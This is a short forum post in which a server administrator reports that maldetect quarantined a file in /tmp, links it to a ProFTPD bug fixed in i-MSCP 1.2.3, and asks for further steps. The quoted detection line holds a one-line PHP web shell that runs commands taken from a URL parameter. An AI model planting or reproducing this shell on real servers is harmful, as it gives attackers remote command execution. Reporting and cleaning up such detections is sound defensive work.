Hello, we just installed maldetect on our server and a malicious script was found
{HEX}php.exe.globals.399 : /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>
After googling this code it seems that this is related to a bug in proftp http://bugs.proftpd.org/show_bug.cgi?id=4169
There is also a thread about this bug in this forum and the bug seems to have been fixed in i-mscp 1.2.3
So this script may have been for some time on our server
maldetect moved this script into quarantine. So far so good ... anything else I should do?